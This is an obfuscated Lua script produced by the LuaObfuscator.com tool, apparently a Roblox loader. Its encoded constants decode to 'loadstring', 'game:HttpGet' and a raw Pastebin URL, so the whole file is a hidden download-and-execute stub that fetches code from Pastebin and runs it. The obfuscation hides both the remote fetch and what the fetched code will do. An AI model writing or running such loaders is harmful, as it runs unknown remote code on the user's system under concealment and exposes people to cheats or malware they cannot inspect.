--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v70=0;while true do if (v70==0) then v19=v0(v3(v30,1,1));return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==0) then v99=v5(v72,v19);v19=nil;v98=1;end if (v98==1) then return v99;end end else return v72;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v73=(v31/((1 + 1)^(v32-(2 -1))))%((5 -3)^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v73-(v73%(620 -(555 + 64))) ;else local v74=931 -(857 + 74) ;local v75;while true do if (v74==(568 -(367 + 201))) then v75=2^(v32-(928 -(214 + 713))) ;return (((v31%(v75 + v75))>=v75) and ((878 -(282 + 595)) + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37=1065 -(68 + (1954 -(892 + 65))) ;local v38;local v39;local v40;local v41;while true do if (v37==(1271 -(226 + 1044))) then return (v41 * (73054774 -56277558)) + (v40 * (65653 -(32 + 85))) + (v39 * (251 + 5)) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;v37=1;end end end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if ((1 -0)==v42) then v45=1 -0 ;v46=(v20(v44,351 -(87 + 263) ,200 -(67 + 113) ) * ((2 + 0)^(78 -46))) + v43 ;v42=2 + 0 ;end if (v42==2) then v47=v20(v44,83 -62 ,983 -(802 + 150) );v48=((v20(v44,85 -53 )==(1 -0)) and  -(1 + 0)) or (998 -(915 + (524 -(416 + 26)))) ;v42=8 -5 ;end if (v42==(9 -6)) then if (v47==(0 + 0)) then if (v46==(0 -(0 + 0))) then return v48 * 0 ;else v47=(2101 -913) -(1069 + (556 -(145 + 293))) ;v45=0 -0 ;end elseif (v47==(4477 -2430)) then return ((v46==(0 + (430 -(44 + 386)))) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/(((2279 -(998 + 488)) -(368 + 423))^(163 -(36 + 75))))) ;end if ((18 -(9 + 1 + 8))==v42) then v43=v23();v44=v23();v42=3 -2 ;end end end local function v25(v49)local v50;if  not v49 then local v76=772 -(201 + 571) ;while true do if (v76==(0 -0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1139 -(116 + 1022)) );v18=v18 + v49 ;local v51={};for v68=4 -(1 + 2) , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (1==v52) then v55=nil;v56=nil;v52=2;end if (v52==(1771 -(1749 + 20))) then v57=nil;v58=nil;v52=3;end if (v52==(1 + 2)) then v59=nil;v60=nil;v52=4;end if (v52==0) then v53=1322 -(1249 + 73) ;v54=nil;v52=1 + 0 ;end if (v52~=4) then else while true do if (v53==0) then local v96=1145 -(466 + 679) ;while true do if (v96~=(2 -1)) then else v53=1;break;end if (v96~=(0 -0)) then else v54=0;v55=nil;v96=1901 -(106 + 1794) ;end end end if (v53~=(1 + 1)) then else v58=nil;v59=nil;v53=3;end if (v53==3) then v60=nil;while true do local v100=0;local v101;local v102;while true do if (v100==(0 + 0)) then v101=0;v102=nil;v100=2 -1 ;end if ((2 -1)==v100) then while true do if (v101~=(114 -(4 + 110))) then else v102=584 -(57 + 527) ;while true do if (v102==(1427 -(41 + 1386))) then local v123=0;local v124;while true do if (v123==0) then v124=0;while true do if (v124~=(103 -(17 + 86))) then else if (v54~=2) then else local v173=0;local v174;local v175;while true do if (v173==0) then v174=0;v175=nil;v173=1 + 0 ;end if (v173==(1 -0)) then while true do if (0==v174) then v175=0 -0 ;while true do if (v175==0) then local v182=166 -(122 + 44) ;local v183;while true do if (0==v182) then v183=0;while true do if (v183==(0 -0)) then for v192=3 -2 ,v59 do local v193=0 + 0 ;local v194;local v195;local v196;local v197;while true do if (v193==1) then v196=nil;v197=nil;v193=1 + 1 ;end if (v193~=(3 -1)) then else while true do if ((65 -(30 + 35))==v194) then local v203=0 + 0 ;while true do if (v203==(1258 -(1043 + 214))) then v194=3 -2 ;break;end if (v203==0) then v195=1212 -(323 + 889) ;v196=nil;v203=1;end end end if (v194==(2 -1)) then v197=nil;while true do if (v195==1) then if (v196==(581 -(361 + 219))) then v197=v21()~=(320 -(53 + 267)) ;elseif (v196==(1 + 1)) then v197=v24();elseif (v196==(416 -(15 + 398))) then v197=v25();end v60[v192]=v197;break;end if (0~=v195) then else local v209=0;while true do if (v209==(982 -(18 + 964))) then v196=v21();v197=nil;v209=3 -2 ;end if (v209~=(1 + 0)) then else v195=1;break;end end end end break;end end break;end if (v193~=(0 + 0)) then else v194=0;v195=nil;v193=851 -(20 + 830) ;end end end v58[3]=v21();v183=1 + 0 ;end if (1~=v183) then else v175=1;break;end end break;end end end if (v175==(127 -(116 + 10))) then for v184=1,v23() do local v185=0 + 0 ;local v186;local v187;local v188;local v189;while true do if (v185==(739 -(542 + 196))) then v188=nil;v189=nil;v185=2;end if (v185~=(0 -0)) then else v186=0;v187=nil;v185=1;end if (v185~=(1 + 1)) then else while true do if (1==v186) then v189=nil;while true do if (v187~=(0 + 0)) then else local v201=0;local v202;while true do if (v201==(0 + 0)) then v202=0 -0 ;while true do if ((2 -1)==v202) then v187=1;break;end if (v202~=(1551 -(1126 + 425))) then else local v210=0;while true do if (v210==(405 -(118 + 287))) then v188=0 -0 ;v189=nil;v210=1122 -(118 + 1003) ;end if (v210~=1) then else v202=2 -1 ;break;end end end end break;end end end if (v187==(378 -(142 + 235))) then while true do if ((0 -0)~=v188) then else v189=v21();if (v20(v189,1 + 0 ,1)==0) then local v204=977 -(553 + 424) ;local v205;local v206;local v207;while true do if (v204==2) then local v211=0 -0 ;local v212;while true do if (v211==0) then v212=0 + 0 ;while true do if (v212~=(0 + 0)) then else local v220=0;while true do if (v220==0) then if (v20(v206,1 + 0 ,1)~=1) then else v207[1 + 1 ]=v60[v207[2 + 0 ]];end if (v20(v206,2,4 -2 )==1) then v207[7 -4 ]=v60[v207[3]];end v220=1;end if (v220==(2 -1)) then v212=1;break;end end end if (1~=v212) then else v204=3;break;end end break;end end end if ((1 + 0)==v204) then local v213=0 -0 ;local v214;while true do if (v213==0) then v214=0;while true do if (v214~=(754 -(239 + 514))) then else v204=1 + 1 ;break;end if (v214~=(1329 -(797 + 532))) then else v207={v22(),v22(),nil,nil};if (v205==(0 -0)) then local v221=0;local v222;local v223;while true do if ((1202 -(373 + 829))==v221) then v222=731 -(476 + 255) ;v223=nil;v221=1131 -(369 + 761) ;end if (v221==1) then while true do if (0==v222) then v223=0 + 0 ;while true do if (v223==(0 -0)) then v207[3]=v22();v207[4]=v22();break;end end break;end end break;end end elseif (v205==1) then v207[5 -2 ]=v23();elseif (v205==(240 -(64 + 174))) then v207[3]=v23() -((1 + 1)^(23 -7)) ;elseif (v205~=(339 -(144 + 192))) then else local v230=216 -(42 + 174) ;local v231;while true do if (v230~=(0 + 0)) then else v231=0 + 0 ;while true do if (v231==0) then v207[3]=v23() -((1 + 1)^16) ;v207[1508 -(363 + 1141) ]=v22();break;end end break;end end end v214=1581 -(1183 + 397) ;end end break;end end end if (v204~=(8 -5)) then else if (v20(v206,3 + 0 ,3 + 0 )==1) then v207[1979 -(1913 + 62) ]=v60[v207[4]];end v55[v184]=v207;break;end if (v204==(0 + 0)) then local v216=0;local v217;while true do if (v216==(0 -0)) then v217=1933 -(565 + 1368) ;while true do if ((0 -0)==v217) then v205=v20(v189,2,3);v206=v20(v189,4,1667 -(1477 + 184) );v217=1;end if ((1 -0)==v217) then v204=1 + 0 ;break;end end break;end end end end end break;end end break;end end break;end if (v186==0) then local v198=856 -(564 + 292) ;while true do if (0~=v198) then else v187=0 -0 ;v188=nil;v198=1;end if (v198==(2 -1)) then v186=305 -(244 + 60) ;break;end end end end break;end end end v54=3;break;end end break;end end break;end end end if (v54==3) then local v176=0 + 0 ;local v177;while true do if (v176==0) then v177=0;while true do if (v177==(476 -(41 + 435))) then local v180=1001 -(938 + 63) ;local v181;while true do if (v180~=(0 + 0)) then else v181=0;while true do if (v181==0) then local v190=0;while true do if (v190==(1125 -(936 + 189))) then for v199=1,v23() do v56[v199-1 ]=v28();end return v58;end end end end break;end end end end break;end end end v124=1 + 0 ;end if ((1614 -(1565 + 48))~=v124) then else v102=1;break;end end break;end end end if (v102==1) then if (v54==1) then local v153=0;while true do if (0~=v153) then else local v165=0 + 0 ;local v166;while true do if ((1138 -(782 + 356))==v165) then v166=267 -(176 + 91) ;while true do if (v166~=(0 -0)) then else local v178=0 -0 ;while true do if (v178==0) then v58={v55,v56,nil,v57};v59=v23();v178=1;end if (v178==(1 + 0)) then v166=1;break;end end end if (v166==1) then v153=1;break;end end break;end end end if ((3 -2)~=v153) then else v60={};v54=6 -4 ;break;end end end if (0~=v54) then else local v154=0;while true do if (v154~=1) then else v57={};v54=1;break;end if (v154==0) then local v167=1018 -(697 + 321) ;local v168;while true do if (v167==(0 -0)) then v168=0;while true do if (v168~=(1 -0)) then else v154=1;break;end if (0==v168) then local v179=0;while true do if (v179==0) then v55={};v56={};v179=1;end if (v179==1) then v168=1;break;end end end end break;end end end end end break;end end break;end end break;end end end break;end if (v53==(2 -1)) then local v97=0;while true do if (v97==(1 + 0)) then v53=2;break;end if (v97==(0 -0)) then local v109=0;while true do if (v109==1) then v97=1;break;end if (v109~=0) then else v56=nil;v57=nil;v109=2 -1 ;end end end end end end break;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v80=v65;local v81=v66;local v82=v67;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do local v95=0;while true do if (v95==0) then v92=v80[v84];v93=v92[1];v95=1;end if (1==v95) then if (v93<=3) then if (v93<=1) then if (v93>0) then v90[v92[2]]=v92[3];else v90[v92[2]]();end elseif (v93==2) then v90[v92[2]]=v63[v92[3]];else local v114=0;local v115;local v116;local v117;local v118;local v119;while true do if (v114==5) then v115=0;for v155=v119,v85 do local v156=0;while true do if (v156==0) then v115=v115 + 1 ;v90[v155]=v116[v115];break;end end end v84=v84 + 1 ;v92=v80[v84];v119=v92[2];v114=6;end if (v114==0) then v115=nil;v116,v117=nil;v118=nil;v119=nil;v90[v92[2]]=v63[v92[3]];v114=1;end if (v114==3) then v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3]~=0 ;v114=4;end if (2==v114) then v119=v92[2];v118=v90[v92[3]];v90[v119 + 1 ]=v118;v90[v119]=v118[v92[4]];v84=v84 + 1 ;v114=3;end if (4==v114) then v84=v84 + 1 ;v92=v80[v84];v119=v92[2];v116,v117=v83(v90[v119](v13(v90,v119 + 1 ,v92[3])));v85=(v117 + v119) -1 ;v114=5;end if (v114==1) then v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v63[v92[3]];v84=v84 + 1 ;v92=v80[v84];v114=2;end if (v114==7) then v92=v80[v84];do return;end break;end if (v114==6) then v90[v119]=v90[v119](v13(v90,v119 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v114=7;end end end elseif (v93<=5) then if (v93>4) then do return;end else local v120=v92[2];v90[v120]=v90[v120](v13(v90,v120 + 1 ,v85));end elseif (v93<=6) then v90[v92[2]]=v92[3]~=0 ;elseif (v93==7) then local v125=0;local v126;local v127;while true do if (0==v125) then v126=v92[2];v127=v90[v92[3]];v125=1;end if (1==v125) then v90[v126 + 1 ]=v127;v90[v126]=v127[v92[4]];break;end end else local v128=0;local v129;local v130;local v131;local v132;while true do if (v128==1) then v85=(v131 + v129) -1 ;v132=0;v128=2;end if (v128==2) then for v163=v129,v85 do local v164=0;while true do if (v164==0) then v132=v132 + 1 ;v90[v163]=v130[v132];break;end end end break;end if (v128==0) then v129=v92[2];v130,v131=v83(v90[v129](v13(v90,v129 + 1 ,v92[3])));v128=1;end end end v84=v84 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F747278624378357500093O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
